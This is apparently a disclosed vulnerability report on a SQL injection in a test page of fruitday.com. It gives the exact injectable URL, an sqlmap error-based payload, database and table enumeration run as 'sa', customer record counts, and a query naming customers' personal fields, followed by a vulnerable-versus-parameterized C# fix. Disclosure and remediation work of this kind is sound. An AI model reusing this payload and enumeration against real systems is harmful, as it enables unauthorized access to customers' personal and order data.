2015-08-19: Details sent to the vendor, awaiting the vendor's handling
2015-08-19: Vendor confirmed; details disclosed to the vendor only
2015-08-29: Details disclosed to core white hats and experts in the relevant field
2015-09-08: Details disclosed to regular white hats
2015-09-18: Details disclosed to intern white hats
2015-10-03: Details disclosed to the public
SQL injection vulnerability
http://hq.fruitday.com:1300/test/
Refresh the page and capture the POST request
http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=%2FwEWBAKd1qmjCwLg2ZN%2BAsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw%2Fsj6SQ%3D%3D&__VIEWSTATE=%2FwEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs%2FMwjG%2BRntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-8-17
Enter '
Test the injection point
http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=%2FwEWBAKd1qmjCwLg2ZN%2BAsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw%2Fsj6SQ%3D%3D&__VIEWSTATE=%2FwEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs%2FMwjG%2BRntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-8-17*
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=/wEWBAKd1qmjCwLg2ZN+AsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw/sj6SQ==&__VIEWSTATE=/wEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs/MwjG+RntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-08-17' AND 4689=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4689=4689) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'RnJS'='RnJS
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Databases
available databases [5]:
[*] fday
[*] master
[*] model
[*] msdb
[*] tempdb
Current database
current database: 'fday'
current user: 'sa'
List the tables in fday
Database: fday
[99 tables]
+----------------------------+
| BagOpLog                   |
| CCBack                     |
| CancelQueue                |
| CardSales                  |
| Changes                    |
| CouponInputs               |
| CouponRequest              |
| CouponSales                |
| CouponSalesReturn          |
| DeliveryCar                |
| DeliveryOrder              |
| DeliveryWave               |
| Department                 |
| Enterprise                 |
| Gifts                      |
| InputOrderJson             |
| InvoiceReccord             |
| InvoiceRequest             |
| OkCardBill                 |
| OnlineBankBill             |
| OnlineCoupon               |
| OrderBak                   |
| Payments                   |
| PaymentsTemp               |
| PreSellRule                |
| Product                    |
| ProductItem                |
| ReChargeInvoice            |
| ReturnOrder                |
| ShouldTransferAccounts     |
| Staff                      |
| StateSyncQueue             |
| TmalJson                   |
| UnionPayBillDetails        |
| aa                         |
| dtproperties               |
| fruit_Activity             |
| fruit_ActivityOrderItem    |
| fruit_Bag                  |
| fruit_BagItem              |
| fruit_BagItemSet           |
| fruit_BagPkg               |
| fruit_BagType              |
| fruit_CC                   |
| fruit_Complaint            |
| fruit_ComplaintItem        |
| fruit_Coupon               |
| fruit_CouponType           |
| fruit_Customer             |
| fruit_DeliveryPerson       |
| fruit_ExtraOrderType       |
| fruit_ExtraTask            |
| fruit_ExtraTaskItem        |
| fruit_ExtraWarehouse       |
| fruit_GoldenCardBill       |
| fruit_GroupOrder           |
| fruit_GroupOrderItem       |
| fruit_Menu                 |
| fruit_OnlinePay            |
| fruit_OrderItemV2          |
| fruit_OrderModifyLog       |
| fruit_OrderOpRemark        |
| fruit_OrderPayInfo         |
| fruit_OrderPkg             |
| fruit_OrderSerial          |
| fruit_OrderV2              |
| fruit_PayMethodReccord     |
| fruit_PayMethodReccordV1   |
| fruit_PkgItem              |
| fruit_PkgType              |
| fruit_Po                   |
| fruit_PoInStockDetails     |
| fruit_PoItem               |
| fruit_ProdSingleReturn     |
| fruit_ProdType             |
| fruit_RefundRecord         |
| fruit_Stock                |
| fruit_Store                |
| fruit_StoreRequestBillItem |
| fruit_StoreRequestPkg      |
| fruit_StoreRequstBill      |
| fruit_SubMenu              |
| fruit_Supplier             |
| fruit_SupplierPayment      |
| fruit_SupplierProd         |
| fruit_UnPaidReccord        |
| fruit_User                 |
| fruit_UserMenu             |
| fruit_orderItemBak         |
| fruit_orderPayment         |
| material_RequestOrder      |
| material_RequestOrderItem  |
| preOrder                   |
| preOrderItem               |
| sysdiagrams                |
| tab_view_product_storage   |
| test1                      |
| view_OutPutStock           |
| view_ReturnProd_OrderNum   |
+----------------------------+
select count(*) from fruit_Customer ;: '276588'
select count(*) from preOrder;: '17019'
select count(*) from fruit_User;: '377'
Look at one row
SELECT TOP 1 age_Range, custom_Address, custom_Level, custom_Mobile, custom_Name, custom_Remark, custom_Tel, custom_Type, department, eAddress, eName, enterprise_Id, id, lastorder_Time, order_Count, salesMan, sex FROM fruit_Customer
order is presumably orders, stock is inventory, and staff is presumably employees; I did not look at the other tables.
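Added example, not the vendor's code (which is not on the page): the date-range lookup behind /test/ written the way sqlmap's result implies it was built, and beside it the parameterized form that closes the hole. The class, method and column names are assumed for illustration; only the table `preOrder` and the parameter names `txtStartDate`/`txtEndDate` come from the report.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;

// Added example, not the vendor's code. "preOrder" is a table from the
// sqlmap listing on this page; column and method names are assumed.
public static class OrderShipmentQuery
{
    // Vulnerable pattern this report implies: txtStartDate / txtEndDate are
    // concatenated into the statement, so a single quote in either value
    // ends the string literal and the rest of the input runs as SQL.
    public static string BuildUnsafeSql(string start, string end)
    {
        return "SELECT id, orderTime FROM preOrder WHERE orderTime BETWEEN '"
               + start + "' AND '" + end + "'";
    }

    // Input validation: the parameters are dates, so accept only the date
    // formats the form actually sends (2015-8-17 and 2015-08-17).
    public static bool TryParseDate(string input, out DateTime value)
    {
        string[] formats = { "yyyy-M-d", "yyyy-MM-dd" };
        return DateTime.TryParseExact(input, formats, CultureInfo.InvariantCulture,
                                      DateTimeStyles.None, out value);
    }

    // Hardened version: validate, then bind typed parameters. The values are
    // sent to SQL Server separately from the statement text, so they cannot
    // change its structure whatever characters they contain.
    public static SqlCommand BuildSafeCommand(SqlConnection conn, string start, string end)
    {
        if (!TryParseDate(start, out DateTime startDate) ||
            !TryParseDate(end, out DateTime endDate))
            throw new ArgumentException("txtStartDate/txtEndDate must be yyyy-MM-dd dates");
        if (endDate < startDate)
            throw new ArgumentException("end date is before start date");

        var cmd = new SqlCommand(
            "SELECT id, orderTime FROM preOrder " +
            "WHERE orderTime >= @start AND orderTime < @endExclusive", conn);
        cmd.Parameters.Add("@start", SqlDbType.DateTime).Value = startDate;
        // Half-open range so orders placed later on the end day are included.
        cmd.Parameters.Add("@endExclusive", SqlDbType.DateTime).Value = endDate.AddDays(1);
        return cmd;
    }
}
```

Because the finding is error-based, turning off detailed error pages in web.config (`<customErrors mode="On">`) removes the error oracle sqlmap relied on but not the injection itself; the parameterized query is the fix, and the application should also not connect as `sa`.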
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-08-19 11:43
Thank you very much for the information you provided; we will confirm it as soon as possible.
None yet